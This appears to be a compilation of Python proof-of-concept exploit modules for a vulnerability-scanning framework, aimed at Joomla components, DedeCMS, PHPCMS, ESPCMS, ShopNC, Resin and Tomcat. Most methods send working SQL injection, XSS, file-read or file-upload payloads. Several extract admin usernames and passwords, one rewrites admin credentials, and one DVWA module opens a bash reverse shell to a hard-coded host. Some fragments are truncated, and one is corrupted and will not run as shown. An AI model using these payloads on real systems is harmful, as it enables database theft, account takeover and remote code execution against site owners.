     ``63e1f04640e83605c1d177544a5a0488`` (md5(3.1415)); on a hit
     ``VerifyInfo`` holds the URL and payload.  Returns ``self.parse_output``.
     """
     exploit = '/index.php?option=com_idoblog&task=profile&Itemid=&userid='
     payload = ("-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"
                "md5(3.1415),FLOOR(RAND(0)*2))x FROM "
                "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)

     result = {}
     if '63e1f04640e83605c1d177544a5a0488' in resp.content:
         result['VerifyInfo'] = {'URL': self.url + exploit, 'Payload': payload}
     return self.parse_output(result)
    def _verify(self, verify=True):
        """Scrape ``/market/?page=N`` listings interactively (Python 2).

        Prompts for a start and stop page, then prints every table row that
        carries the "提交" (submitted) label: author, time, type, ssvid, title
        and award.  ``VerifyInfo.URL`` is set whenever at least one such row
        was seen.  ``verify`` is accepted but unused.
        Returns ``self.parse_attack(result)``.
        """
        result = {}
        total = 0
        start_page = raw_input('start page:')
        stop_page = raw_input('stop page:')
        first_page = int(start_page)
        last_page = int(stop_page)

        for page_no in range(first_page, last_page + 1):
            response = req.get(self.url + '/market/?page=%d' % page_no).content
            rows = re.findall('<tr>([\s\S]+?)</tr>', response)  # non-greedy row split
            for row in rows:
                if '<span class="label label-brand">提交</span>' not in row:
                    continue
                author = re.search('<img [\s\S]+?>([\s\S]+?)</a>', row).group(1)
                time = re.search('<td class="text-center datetime">[\s\S]+?(\d[\d :-]+)[\s\S]+?</td>', row).group(1)
                vul_type = re.search('<td class="text-center">(.+)</td>', row).group(1)
                vid = re.search('<a class="vul-title" href="/vuldb/(ssvid-\d+)">([\s\S]+?)</a>', row).group(1)
                title = re.search('<a class="vul-title" href="/vuldb/ssvid-\d+">([\s\S]+?)</a>', row).group(1)
                award = re.search('</i>[\s\S]+?([\d\.]+kB)[\s\S]+?</td>', row).group(1)

                total += 1
                print '\n'
                print '%d.' % total
                for field in (author, time, vul_type, vid, title, award):
                    print field
                print '\n'

                result['VerifyInfo'] = {'URL': self.url}
        print 'total:' , total
        return self.parse_attack(result)
 def _attack(self):
     """Attack mode for ``com_timereturns``: read database user and version.

     When the body contains ``Duplicate entry`` it is scanned for
     ``$~~~$<user>***<version>$~~~$``; captures go to
     ``DatabaseInfo.Username`` / ``DatabaseInfo.Version``.
     Returns ``self.parse_output(result)``.
     """
     payload = ("1' AND (SELECT 1222 FROM(SELECT COUNT(*),"
                "CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,"
                "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB")
     exploit = "/index.php?option=com_timereturns&view=timereturns&id="
     pars = r"\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }

     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)
     result = {}
     if 'Duplicate entry' in resp.content:
         match = re.search(pars, resp.content, re.I | re.M)
         if match:
             result['DatabaseInfo'] = {
                 'Username': match.group(1),
                 'Version': match.group(2),
             }
     return self.parse_output(result)
 def _verify(self):
     """Reflected XSS check on com_carman's `msg` parameter.

     Sends `"><script>alert(/<marker>/)</script>` and reports VerifyInfo only
     when the response is 200 and the script tag comes back unencoded.  The
     marker is deliberately unlikely to occur in normal page output.
     """
     outcome = {}
     marker = "<0x!Q_az*^~>"
     injected = '"><script>alert(/' + marker + '/)</script>'
     entry = '/index.php?option=com_carman&msg='
     browser_headers = {
         'User-Agent':
         'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept':
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
         "Content-Type": "application/x-www-form-urlencoded"
     }
     page = req.get(url=self.url + entry + injected, headers=browser_headers, timeout=50)
     reflected = '<script>alert(/' + marker + '/)</script>' in page.content
     if page.status_code == 200 and reflected:
         outcome['VerifyInfo'] = {
             'URL': self.url + entry,
             'Payload': injected,
         }
     return self.parse_output(outcome)
 def _verify(self):
     """Error-based SQLi check on com_hdflvplayer's `id` parameter.

     The floor(rand(0)*2) GROUP BY trick makes MySQL raise a duplicate-key
     error whose key contains md5(3.1415); that hash appearing in the body
     proves the injected SQL was executed.
     """
     outcome = {}
     md5_of_pi = '63e1f04640e83605c1d177544a5a0488'  # md5(3.1415)
     injection = ("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT"
                  "(md5(3.1415),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA"
                  ".CHARACTER_SETS GROUP BY x)a) -- -")
     entry = '/index.php?option=com_hdflvplayer&id='
     browser_headers = {
         'User-Agent':
         'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept':
         'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive'
     }
     page = req.get(url=self.url + entry + injection, headers=browser_headers, timeout=50)
     if md5_of_pi in page.content:
         outcome['VerifyInfo'] = {
             'URL': self.url + entry,
             'Payload': injection,
         }
     return self.parse_output(outcome)
文件: ESC8832.py 项目: WireROP/Bank-1
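    def _attack(self):
        """Stored XSS on the ESC 8832 via escform.esp's `opmsg` field.

        Obtains a session through self.common(), stores an alert() carrying
        a random md5 token as an operator message (formid=131), then reads
        the message list (menuid=257) to see whether the token is rendered.
        On a hit the injected message is deleted (menuid=259).  The session
        is logged out (menuid=11) on every path.
        """
        result = {}
        sessionid = self.common()
        if not sessionid:
            return self.parse_result(result)
        menu = self.url + "/escmenu.esp?sessionid=" + sessionid
        token = hashlib.new('md5', randomStr()).hexdigest()
        payload = '<script>alert("%s")</script>' % token
        try:
            req.get(self.url + "/escform.esp?sessionid=" + sessionid + "&formid=131&opmsg=" + payload)
            response = req.get(menu + "&menuid=257").content
            if token in response:
                result['VerifyInfo'] = {'URL': self.url}
                result['XSSInfo'] = {'Payload': payload}
                req.get(menu + "&menuid=259")  # delete the injected message
        finally:
            # The original only logged out on a hit, leaving the device session
            # open whenever the token was not found or a request raised.
            req.get(menu + "&menuid=11")  # log out
        return self.parse_result(result)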
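    def _verify(self):
        """Probe admin_topic_action_logging.php with an attacker-controlled phpbb_root_path.

        phpbb_root_path is set to "http://?" (the classic phpBB remote-include
        probe); the body is then checked for both 'Baiduspider' and
        'Googlebot' as the success oracle.  NOTE(review): which file on the
        target is expected to carry those two strings is not shown here --
        confirm against the upstream PoC before relying on the oracle.
        """
        result = {}
        vul_url = '%s/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://?' % self.url
        res = req.get(vul_url)

        # The original read `and 'Googlebot': in res.content` -- a syntax error
        # that stopped the PoC from loading at all.  Both markers must appear.
        if 'Baiduspider' in res.content and 'Googlebot' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        # The original fell off the end and returned None; hand the result to
        # the framework as the sibling PoCs do (NOTE(review): confirm which
        # parse_* method this PoC's base class expects).
        return self.parse_output(result)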
文件: ESC8832.py 项目: WireROP/Bank-1
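    def _verify(self, verify=True):
        """Log in via self.common(), print the device information page (menuid=268), log out.

        `verify` is accepted for interface compatibility and not used.
        VerifyInfo is reported as soon as a session id was obtained (the
        original behaviour); the parsed title and field table are only
        printed.  The session is always logged out (menuid=11), even when
        the page does not parse.
        """
        result = {}
        sessionid = self.common()
        if not sessionid:
            return self.parse_result(result)
        menu = self.url + "/escmenu.esp?sessionid=" + sessionid
        try:
            response = req.get(menu + "&menuid=268").content
            # The original called .group(1) unconditionally and raised
            # AttributeError on a non-matching page, skipping the logout below.
            title = re.search(r"<TH align=left>(ESC \d+ [\s\S]+?)</TH>", response)
            if title is not None:
                print(title.group(1) + ' \n')
            fields = re.findall(r"<TH align=left>([a-zA-Z ]+?)</TH><TD>([\s\S]+?)</TD>", response)
            for label, value in fields:
                print(label + ' : ' + value)

            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        finally:
            req.get(menu + "&menuid=11")  # log out
        return self.parse_result(result)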
	def _verify(self):
		"""DedeCMS plus/search.php typeArr[] SQL injection check.

		The typeArr[] key carries a UNION SELECT that reads userid/pwd from
		`#@__admin`.  The oracle is the DedeCMS error page text, which is a
		weak signal (any SQL error triggers it); the selected columns are not
		parsed.  self.url is joined without a '/', so it must end with one.
		"""
		probe = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
		page = req.get(probe).content
		hit = 'DedeCMS Error Warning!' in page
		outcome = {'VerifyInfo': {'URL': self.url}} if hit else {}
		return self.parse_result(outcome)
 def _verify(self):
     """Union-based SQLi check on index.php?ID=.

     md5(666) is selected into the second column; its hash
     fae0b27c451c728867a567e8c1bb4e53 in the body confirms execution.
     """
     outcome = {}
     injection = "/index.php?ID=1 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
     probe_url = self.url + injection
     if 'fae0b27c451c728867a567e8c1bb4e53' in req.get(probe_url).content:
         outcome['VerifyInfo'] = {'URL': probe_url}
     return self.parse_verify(outcome)
 def _verify(self):
     """DedeCMS plus/search.php typeArr[] SQL injection check.

     The typeArr[] key carries a UNION SELECT that reads userid/pwd from
     `#@__admin`.  The oracle is the DedeCMS error page text -- a weak
     signal, since any SQL error produces it; the selected columns are not
     parsed.  self.url is joined without a '/', so it must end with one.
     """
     probe = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
     page = req.get(probe).content
     hit = 'DedeCMS Error Warning!' in page
     outcome = {'VerifyInfo': {'URL': self.url}} if hit else {}
     return self.parse_result(outcome)
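    def _verify(self, verify=True):
        """Check whether install/index.php.bak is served as a readable source backup.

        `verify` is accepted for interface compatibility and not used.
        """
        result = {}
        vul_url = "%s/install/index.php.bak" % self.url

        response = req.get(vul_url)
        # A 200 on its own is a weak oracle: many sites answer every path with
        # a 200 "not found" page.  A served .php.bak is raw PHP source, so also
        # require the PHP open tag before reporting a hit.
        if response.status_code == 200 and '<?php' in response.content:
            result["VerifyInfo"] = {}
            result["VerifyInfo"]["URL"] = self.url

        return self.parse_attack(result)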
 def _verify(self):
     """Exposed phpinfo() check: GET self.url (Referer set to itself) and look for 'PHP Version'."""
     outcome = {}
     page = req.get(self.url, headers={'referer': self.url}, timeout=10)
     if page.status_code == 200 and 'PHP Version' in page.content:
         outcome['VerifyInfo'] = {'URL': self.url}
     return self.parse_attack(outcome)
	def _verify(self):
		"""DedeCMS plus/recommend.php SQL injection through the _FILES[type][tmp_name] variable.

		The crafted tmp_name closes the quoted value and UNION-selects
		`userid|pwd` from `#@__admin`; a vulnerable target echoes it inside an
		<h2> with a '|' separator, which is what the regex looks for.  Only the
		URL is recorded -- the matched credentials are discarded.  self.url is
		joined without a '/', so it must end with one.
		"""
		probe = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
		page = req.get(probe).content
		leak = re.compile('<h2>.*?\|(.*?)</h2>').search(page)
		outcome = {}
		if leak is not None:
			outcome = {'VerifyInfo': {'URL': self.url}}
		return self.parse_result(outcome)
	def _verify(self):
		"""DedeCMS plus/download.php arrs1[]/arrs2[] injection, detected via the "Safe Alert: Request Error step 2!" text.

		WARNING -- this "verify" is destructive.  The char-code arrays decode to
		  arrs1 = "cfg_dbprefix"
		  arrs2 = "admin` SET `userid`='xuan', `pwd`='f297a57a5a743894a0e4' where id=1 #"
		i.e. an UPDATE that overwrites the credentials of the admin row with
		id=1.  Running it changes the target's admin login; it is not a
		read-only check.  The username/password reported below are masked
		('******') in this listing.
		"""
		result = {}
		target = self.url + "/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=120&arrs2[]=117&arrs2[]=97&arrs2[]=110&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35"
		response = req.get(target)
		content = response.content
		# find() > 0 would miss a match at offset 0; harmless for an HTML body.
		if content.find('Safe Alert: Request Error step 2!') > 0:
			result = {'VerifyInfo':{}}
			result['VerifyInfo']['URL'] = self.url
			# Masked by the listing; in the original these are the credentials
			# written by the UPDATE above.
			result['VerifyInfo']['username'] = '******'
			result['VerifyInfo']['password'] = '******'
		return self.parse_result(result)
 def _verify(self):
     """Union SQLi check on /blog-by-cat/<id>.

     md5(1) is placed in the fifth column; c4ca4238a0b923820dcc509a6f75849b
     in the body confirms that column is echoed.
     """
     outcome = {}
     base = '%s/blog-by-cat' % self.url
     probe = base + '/-1 union select 1,2,3,4,md5(1),6,7,8'
     if 'c4ca4238a0b923820dcc509a6f75849b' in req.get(probe).content:
         outcome['VerifyInfo'] = {'URL': base, 'Payload': probe}
     return self.parse_output(outcome)
文件: Himail.py 项目: Gh05ter/Bank
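 def _verify(self):
     """Arbitrary file read through the Resin tutorial servlet's inputFile parameter.

     Requests resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
     relative to the host root and reports VerifyInfo when the body looks
     like a passwd file.
     """
     result = {}
     parts = urlparse.urlparse(self.url)
     # Build from scheme://host/ so a self.url that carries a path or lacks a
     # trailing slash cannot break the request.  The original computed this
     # and then used self.url + payload anyway, leaving it unused.
     base = '%s://%s/' % (parts.scheme, parts.netloc)
     payload = 'resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd'
     target = base + payload
     res_exp = req.get(target)
     # VerifyInfo is populated only on a hit; the original created it
     # unconditionally, so an empty VerifyInfo was reported on every miss.
     # '/bin/bash' is the oracle kept from the original; a passwd file whose
     # shells are all /bin/sh would be missed ('root:' would be more robust).
     if res_exp.status_code == 200 and '/bin/bash' in res_exp.content:
         result['VerifyInfo'] = {'URL': target}
     return self.parse_attack(result)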
文件: poc.py 项目: flyr4nk/Sebug
 def _verify(self):
     """ESPCMS adminsoft citylist SQL injection check (runs only when self.check_argv() passes).

     parentid=-1 UNION ... md5(1): a hit echoes c4ca4238a0b923820dcc509a6f75849b.
     Like the original, returns None when check_argv() fails.
     """
     if not self.check_argv():
         return None
     outcome = {}
     payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(floor(rand(0)*2),md5(1)),4,5"
     page = req.get(urlparse.urljoin(self.url, 'adminsoft/index.php' + payload))
     if page.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in page.content:
         outcome['VerifyInfo'] = {
             'URL': urlparse.urljoin(self.url, 'adminsoft/index.php'),
             'Payload': payload,
         }
     return self.parse_attack(outcome)
    def _verify(self):
        """Exposed .git/config check.

        Fetches <url>/.git/config with TLS verification disabled
        (verify=False, as in the original -- acceptable for a scanner, never
        for a real client) and reports a hit when a `[remote "origin"]`
        section is present.
        """
        target_url = '/.git/config'
        body = req.get(self.url + target_url, timeout=10, verify=False).content
        hit = '[remote "origin"]' in body
        result = {'VerifyInfo': {'URL': self.url + target_url}} if hit else {}
        return self.parse_attack(result)
    def _verify(self):
        """PHPCMS data/js.php error-based SQLi through the Referer header.

        id=1 is requested with a Referer carrying a floor(rand(0)*2)/md5(1)
        GROUP BY payload; c4ca4238a0b923820dcc509a6f75849b in a 200 body
        shows the header reached a query.
        """
        outcome = {}
        target = urlparse.urljoin(self.url, '/data/js.php?id=1')
        injected_referer = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
        page = req.get(target, headers={'Referer': injected_referer})
        if page.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in page.content:
            outcome['VerifyInfo'] = {'URL': target, 'Payload': injected_referer}

        return self.parse_attack(outcome)
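	def _verify(self):
		"""DedeCMS plus/guestbook.php SQL injection via the admin `editok` action.

		Fetches the guestbook, takes the first message id from a
		`guestbook.php?action=admin...` link, then requests editok with a msg
		value that closes the quoted string and appends `,msg=user(),email='`.
		The guestbook is re-fetched and its msgtd cells scanned for an
		'@localhost' database user.  Note this probe WRITES to the target (it
		rewrites a guestbook entry); it is not a read-only check.
		"""
		result = {}
		guestbook_url = self.url + "/plus/guestbook.php"
		soup = BeautifulSoup(req.get(guestbook_url).content, 'lxml')
		msgid = None
		for anchor in soup.findAll('a'):
			href = anchor.get('href')
			# get('href') is None for anchors without one; the original raised
			# AttributeError on .startswith in that case.
			if href and href.startswith('guestbook.php?action=admin'):
				msgid = href[30:]
				break
		if msgid is None:
			print("No msgid find,don't f**k this vulu")
			return self.parse_result(result)
		payload = self.url + "/plus/guestbook.php?action=admin&job=editok&id={0}&msg=',msg=user(),email='".format(msgid)
		# The original requested the plain guestbook URL here instead of
		# `payload`, so the injection was never actually sent.
		req.get(payload)
		# Re-parse the fresh page: the original re-fetched it but kept scanning
		# the stale soup built before the injection.
		soup = BeautifulSoup(req.get(guestbook_url).content, 'lxml')
		for cell in soup.findAll('td', attrs={'class': 'msgtd'}):
			if cell.text.find('@localhost') >= 0:
				result = {'VerifyInfo': {'URL': self.url}}
				break
		# Always go through the framework; the original returned None on a miss.
		return self.parse_result(result)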
文件: poc.py 项目: flyr4nk/Sebug
 def _attack(self):
     """Read the first ESPCMS admin name/password through the citylist UNION injection (only when self.check_argv() passes).

     The table is hard-coded as espcms_v6.espcms_admin_member; a target with
     a different database name or prefix will not match.  Returns None when
     check_argv() fails, as the original did.
     """
     if not self.check_argv():
         return None
     outcome = {}
     payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(char(45,45,45),name,char(45,45,45),password,char(45,45,45)),4,5 FROM espcms_v6.espcms_admin_member"
     page = req.get(urlparse.urljoin(self.url, 'adminsoft/index.php' + payload))
     if page.status_code == 200:
         # ---<name>---<password>---  (the char(45,45,45) delimiters above)
         leak = re.search(r'---(.+)---(.+)---', page.content, re.I | re.M)
         if leak is not None:
             outcome['AdminInfo'] = {
                 'Username': leak.group(1),
                 'Password': leak.group(2),
             }
     return self.parse_attack(outcome)
文件: poc.py 项目: flyr4nk/Sebug
 def _verify(self):
     """Error-based SQLi check on index.php/api/count/index?param=admin|<sql>.

     md5(1) inside a floor(rand(0)*2) duplicate-key error proves execution.
     The vulnerable endpoint answers 500 rather than 200, so that is the
     status required for a hit.
     """
     outcome = {}
     payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),md5(1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)"
     page = req.get(urlparse.urljoin(self.url, 'index.php/api/count/index' + payload),
                    headers={'Referer': 'http://www.baidu.com'})
     if page.status_code == 500 and 'c4ca4238a0b923820dcc509a6f75849b' in page.content:
         outcome['VerifyInfo'] = {
             'URL': urlparse.urljoin(self.url, 'index.php/api/count/index'),
             'Payload': payload,
         }
     return self.parse_output(outcome)
    def _verify(self):
        """Interactive privilege-escalation check against /index.php?r=me/setBasic.

        Prompts for an email and password, and (in the part of the code lost
        from this listing) logs in and POSTs the UserInfo payload; if the admin
        link is then present, the admin settings page is requested with the
        session cookies.  NOTE(review): the listing is corrupted at the
        getpass() line -- the site masked text between `getpass.getpass(` and
        the find() call, so the login/setBasic requests that define
        `find_result` and `admin_result` are missing here and the method does
        not parse as shown.
        """
        result = {}
        # Endpoints
        vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic')
        logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout')
        login_url = urlparse.urljoin(self.url, '/index.php?r=u/login')
        admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site')
        # Privilege-escalation payload: the form-encoded UserInfo fields include
        # UserInfo[IsAdmin] (mass-assignment vector; value 0 as listed here).
        payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0="

        headers = {"Content-Type": "application/x-www-form-urlencoded"}

        email = raw_input("Email: ")
        # Corrupted in the listing (see docstring): the original code between
        # the getpass() call and the find() of the admin-panel link is lost.
        password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>')
            if find_result != -1:
                # Reuse the session cookies from the admin-page response
                cookies = admin_result.cookies
                # POST to the admin settings page with that session
                get_shell_result = req.post(admin_url, cookies=cookies, headers=headers)

                # Dumps the live session cookies to stdout -- sensitive output.
                print cookies
                print get_shell_result.content
                print get_shell_result.cookies

                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Postdata'] = payload
        return self.parse_attack(result)
 def _attack(self):
     """Dump one phpcms_member username/password through the data/js.php Referer SQLi.

     The duplicate-key error text carries `1--<username>---<password>--`,
     which is parsed out of MySQL's "Duplicate entry ... for key" message.
     """
     outcome = {}
     target = urlparse.urljoin(self.url, '/data/js.php?id=1')
     injected_referer = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
     page = req.get(target, headers={'Referer': injected_referer})
     if page.status_code != 200:
         return self.parse_attack(outcome)
     leak = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', page.content, re.I | re.M)
     if leak is not None:
         outcome['AdminInfo'] = {
             'Username': leak.group(1),
             'Password': leak.group(2),
         }
     return self.parse_attack(outcome)
文件: poc.py 项目: flyr4nk/Sebug
 def _attack(self):
     """Dump one v4_admin adminname/adminpass through the api/count/index error-based SQLi.

     The duplicate-key error carries `1--<adminname>---<adminpass>--`; the
     vulnerable endpoint answers 500 rather than 200, so that is the status
     required before parsing.
     """
     outcome = {}
     payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(select/**/concat(char(45,45),adminname,char(45,45,45),adminpass,char(45,45))/**/from/**/v4_admin/**/limit/**/1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)"
     page = req.get(urlparse.urljoin(self.url, 'index.php/api/count/index' + payload),
                    headers={'Referer': 'http://www.baidu.com'})
     if page.status_code != 500:
         return self.parse_output(outcome)
     leak = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', page.content, re.I | re.M)
     if leak is not None:
         outcome['AdminInfo'] = {
             'Username': leak.group(1),
             'Password': leak.group(2),
         }
     return self.parse_output(outcome)
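    def _verify( self ):
        """Log into DVWA, confirm command injection in /vulnerabilities/exec, then launch a reverse shell.

        Flow: GET /login.php for the CSRF user_token (taken as the 4th
        <input>) and the session cookie, force security=low, POST the login,
        then POST `ip=127.0.0.1;echo "<p><md5></p><br/>"` and check that the
        md5 is echoed inside <pre><p>.  On a hit a bash reverse shell to
        callback_host:callback_port is fired -- start the listener first.

        The login credentials are masked ('******') in this listing and must
        be filled in before use.
        """
        result = {}
        username = '******'  # login account (masked in this listing)
        password = '******'  # login password (masked in this listing)
        # Reverse-shell listener.  Hard-coded in the original; named here so
        # they are not buried inside the payload string.
        callback_host = '192.168.1.55'
        callback_port = 8888

        login_page = req.get(self.url + "/login.php")
        inputs = pq(login_page.text)("input")
        # NOTE(review): positional token lookup -- any change in the DVWA login
        # form layout silently breaks this.
        token = inputs[3].value
        cookies = login_page.cookies.get_dict()
        cookies['security'] = 'low'  # drop DVWA to its easiest mode
        login_data = {'username': username, 'password': password, 'user_token': token, 'Login': '******'}
        req.post(self.url + "/login.php", data=login_data, cookies=cookies)

        # Random marker so a cached or static page cannot fake a hit.
        marker = hashlib.md5(str(random.randint(0, 1000)).encode('ascii')).hexdigest()
        probe = {'ip': '127.0.0.1;echo "<p>' + marker + '</p><br/>"', 'Submit': 'Submit'}
        response = req.post(self.url + "/vulnerabilities/exec/index.php", data=probe, cookies=cookies)
        echoed = pq(response.text)('pre p').html()

        if echoed != marker:
            # The original fell off the end here and returned None.
            return self.parse_output(result)

        # bash reverse shell.  The original payload ended with a stray '"',
        # which leaves bash waiting for a closing quote so it never connects.
        shell = {'ip': '127.0.0.1;bash -i >& /dev/tcp/%s/%d 0>&1' % (callback_host, callback_port), 'Submit': 'Submit'}
        req.post(self.url + "/vulnerabilities/exec/index.php", data=shell, cookies=cookies)
        # (The original also carried two commented-out alternatives: writing
        # the same one-liner to shell.sh and executing it, and a python
        # socket/dup2 shell the author noted only worked when run by hand.)

        result['extra'] = {}
        result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' "
        return self.parse_output(result)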
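    def _verify(self):
        '''verify mode: arbitrary JSP upload via HTTP PUT.

        OPTIONS on a bogus path is checked for PUT in the Allow header; then a
        one-line JSP printing a+b for two random six-digit numbers is PUT to
        <epoch>.jsp/ (the trailing slash is presumably the path trick that
        keeps the request away from the JSP servlet) and fetched back without
        the slash.  A 201 on the PUT plus the computed sum in the body is a
        hit.  The uploaded JSP is NOT removed afterwards.
        '''
        result = {}
        a = random.randint(100000, 900000)
        b = random.randint(100000, 900000)
        body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%out.println({0}+{1});%>''' .format(str(a),str(b))
        url = self.url
        resp = req.options(url+'/asda',timeout=10)
        # The original used .find('PUT') > 0, which misses an Allow header that
        # starts with PUT (find() returns 0 there).
        if 'allow' in resp.headers and 'PUT' in resp.headers['allow']:
            shell_url = url + "/" + str(int(time.time())) +'.jsp/'
            resp1=req.put(shell_url,body)
            print(resp1.status_code)
            resp2=req.get(shell_url[:-1])
            c = a + b

            # NOTE(review): 201 is only sent for a newly created resource; an
            # overwrite (same second, same name) answers 204 and is reported as
            # a miss here.
            if resp1.status_code == 201 and str(c) in resp2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url

        return self.parse_output(result)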
    def _verify(self):
        """ShopNC member_address SQLi check: a true_name[] array element breaks out of the INSERT value list.

        md5(0x2333333) is written into the record through the injected value
        list; the address list page is then fetched and scanned for
        525c6bd8bbf951e6863256456f328265.  The POST presumably leaves a test
        address row on the target.
        """
        outcome = {}
        list_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
        submit_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')

        payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
        post_data = ("form_submit=ok&id=&true_name[]="
                     + payload
                     + "&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")

        req.post(submit_url, data=post_data, headers={"Content-Type": "application/x-www-form-urlencoded"})
        listing = req.get(list_url)
        if listing.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in listing.content:
            outcome['VerifyInfo'] = {'URL': submit_url, 'Payload': payload}
        return self.parse_attack(outcome)
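    def _attack(self):
        """Dump the first shopnc_admin row (admin_name + admin_password) through the member_address SQLi.

        A crafted true_name[] element closes the INSERT value list with two
        `concat(0x7e, (SELECT ...))` columns; the address list page is then
        fetched and every '~...' token collected.  The POST presumably leaves
        a test address row on the target.
        """
        result = {}
        url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
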